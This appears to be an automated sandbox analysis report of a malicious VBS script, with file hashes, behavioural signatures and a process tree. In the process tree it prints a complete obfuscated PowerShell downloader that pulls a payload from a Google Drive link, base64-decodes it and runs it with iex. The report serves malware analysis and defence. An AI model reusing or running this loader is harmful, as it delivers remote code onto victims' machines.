Analysis
-
max time kernel
146s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
09/05/2024, 02:01
Static task
static1
Behavioral task
behavioral1
Sample
c7fc243d16dc43df1a26ed5f80b59419c420f5f9145f91069aa140cee00e84de.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
c7fc243d16dc43df1a26ed5f80b59419c420f5f9145f91069aa140cee00e84de.vbs
Resource
win10v2004-20240426-en
General
-
Target
c7fc243d16dc43df1a26ed5f80b59419c420f5f9145f91069aa140cee00e84de.vbs
-
Size
10KB
-
MD5
c904ffa3ae78d7110e220511767ab366
-
SHA1
65d853e00e6793fafe910c48fe2a15ffbfda04ed
-
SHA256
c7fc243d16dc43df1a26ed5f80b59419c420f5f9145f91069aa140cee00e84de
-
SHA512
2a6389c4eaecb41dcda5a85c6d8b060df1bba485a4f48666eb1489ba3ee27c058599b10e61fc093b17ee076afec098492230946e3d7b033c4fe32a264590fc93
-
SSDEEP
192:JkJ2wGFpqbsnhQ5hcAReFAHvU/OVAkZC3qEsWcmitxaYaMrpKVgJO:JIqpqb0hmhvuaAKusWcVWZVSO
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2992 WScript.exe 13 620 powershell.exe 23 620 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 11 drive.google.com 13 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 620 powershell.exe 620 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 620 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2992 wrote to memory of 620 2992 WScript.exe 87 PID 2992 wrote to memory of 620 2992 WScript.exe 87 PID 620 wrote to memory of 4768 620 powershell.exe 89 PID 620 wrote to memory of 4768 620 powershell.exe 89
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c7fc243d16dc43df1a26ed5f80b59419c420f5f9145f91069aa140cee00e84de.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tildelingsstningernes = 1;$Pulls='Su';$Pulls+='bstrin';$Pulls+='g';Function Sackmaker($Beskyttelsesobjekter){$Nothingist=$Beskyttelsesobjekter.Length-$Tildelingsstningernes;For($Lovliggrelse=1;$Lovliggrelse -lt $Nothingist;$Lovliggrelse+=2){$Fieldwort+=$Beskyttelsesobjekter.$Pulls.Invoke( $Lovliggrelse, $Tildelingsstningernes);}$Fieldwort;}function Produktionsbestemtes($Humblie){. ($Forpligtiger) ($Humblie);}$Toldsteders=Sackmaker 'HM oHzNi lPlEaC/,5O.,0 .(UWBi n d oAw s N T .1S0.. 0F;M W,iLnC6P4.; xD6 4 ;C rNvs:S1F2F1P.,0A)U ,GTe c,k o./,2n0Q1 0P0L1 0S1 FSihr,effRoBxU/.1T2 1N.S0h ';$Fyrenes=Sackmaker 'EU s e,r -,A g.eSn t, ';$Jenvippe=Sackmaker ' hVt tMpCs.:F/./Bd.r iBvKeM.Pg oFoFg lRe .Uc o m /iuScD?.eKxTp oKrPt,=PdBoCw n ltoJa d &SiGd =,1,NRXIQDCADFtBvH4 q E K.RP9Ow eez - 8,AA4P9 N G eDc zsVsz K 5,c 7 ';$Afledere=Sackmaker 'T>U ';$Forpligtiger=Sackmaker ',i e xS ';$Unsuburban='Ndtrftiges';Produktionsbestemtes (Sackmaker 'fSPeAt -BC o n,t,e nAt - P a t.h BTF:H\ D i,n.i tBr i l eP.St,xSt -eV aVlHu e G$ U n sIu b.uSrAbDa nS; ');Produktionsbestemtes (Sackmaker ' i fS (.tSe s t -Tp a t h TS:S\KD.iKnIiPtDr iPlse .St.x tR) {IeUx.i tB} ; ');$Superinvolution = Sackmaker ' e.c,hOo C%Sa,p p,dBa.t aF% \,oBrAd s.tprEeCn,gS.FAMfsfC .&B&C ,eKc,hPoC L$V ';Produktionsbestemtes (Sackmaker 'T$.gKlSo bRa,l :.A.i rTbMr u s hF= (Ac mVdU C/FcB j$,SLu,p e rTiDn v.ovl,uLtDiAoSn,) ');Produktionsbestemtes (Sackmaker 'C$DgClPoMb.aAl :DD i m e t hFyslAs.uEl,f o x iSdTe =.$.JLe.n v,isp.p e..AsOp l iGtM( $BA f.l ePdTetrCe,) ');$Jenvippe=$Dimethylsulfoxide[0];Produktionsbestemtes (Sackmaker ' $,gAl o bFa lS: D.e,n dBr o c lKa sDt,iPc =ENBe wK-sO.bUjBeMcRt. S yLs,tKe,m . N eNtB.fWTepb Cul.i e n t. ');Produktionsbestemtes (Sackmaker ' $ D eHn,dSrUoScHl,a.sKtRi,cb..HHe,aFd e rSsI[,$ F y.r e n e sT]V=F$,TSo lEd sNt eFd eZrBsP ');$Overreligion=Sackmaker ' D eMn dEr,o.c l a.s t iSc..VDFo w n l oQaDd FFiil e ( $TJ eCnBv,i pkpSeA,k$mCSoAnItRrOa cHt iRb,l yZ2.5S3,) ';$Overreligion=$Airbrush[1]+$Overreligion;$Contractibly253=$Airbrush[0];Produktionsbestemtes (Sackmaker ' $sgPl,oKb.aKl.:,G,eLr tNh.st= ( TRe s t - P a,tHhB .$.CAo n.t rSaBcTt iCbGlNy 2.5O3 ), ');while (!$Gerths) {Produktionsbestemtes (Sackmaker '.$Bg l oWbBaKlF: KNi,n d t,nBd eBr n.eR=.$ t rFu eU ') ;Produktionsbestemtes $Overreligion;Produktionsbestemtes (Sackmaker 'OS tUaKrRtS-,S lPeHe pS 4A ');Produktionsbestemtes (Sackmaker ' $Lg.lAoIb aAlE:HGDe rTtYh,s =E(VTDe s,tS- P.aFt h. T$AC oSn tcrDa.cStUiKb,lPyU2P5 3.), ') ;Produktionsbestemtes (Sackmaker 'F$Vg.lIo bTa.lR:.IMgAn,o rAaEbGlEe =T$ gsl o bGa lM:LU dUfBrOibt ngiMnCgBe nPsR+M+Y%a$FD,irmteSt hSy l sFu.l.fao,xMi d e..LcaoNu n tK ') ;$Jenvippe=$Dimethylsulfoxide[$Ignorable];}$Realindkomsters=394645;$Lungebetndelserne=27016;Produktionsbestemtes (Sackmaker 'S$ g lNo,bVa,l,:SS,tme vTe dKo rGe risS = LGSeMt,- CPo n.t,e.nWt, $ CLoPn t,rNa c t iCbVlFy 2 5L3 ');Produktionsbestemtes (Sackmaker 'U$ gPlLosbUa l : SEh aPc,k,l e,wKi s e, =, p[CSKy s.the,m..SCDo n v e r t,]S: :EFGrIoBmKB aHs e 6 4BSBt,rDiCn,g.(S$ S t eBvOe dPoGr,ejrFs ), ');Produktionsbestemtes (Sackmaker ' $Kg l,oKb a.lT:.B,l o.ogd w o.r.t.hSyP D=o ,[fS y sStDeSmH.FTBe xEt ..EFnScSobd i,n,gM]A: : A,S,C IUIU.KG eRt SStCr iAnSg.(,$DSUhNaAc,kAlIePwVi s eK) ');Produktionsbestemtes (Sackmaker 'H$Fg lMohbAaEl,: S p rKiRgVgViPeSrC= $MB lDoOoedSw.o rRt.htyP.Fs uSbBsStFrGiDn g (.$MR e aFl i n.d k.o mGsCtPeCr s ,S$SL,u n.g.ePbTePt,n d.eIlGs,e.rOn,e ) ');Produktionsbestemtes $Spriggier;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\ordstreng.Aff && echo $"3⤵PID:4768
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82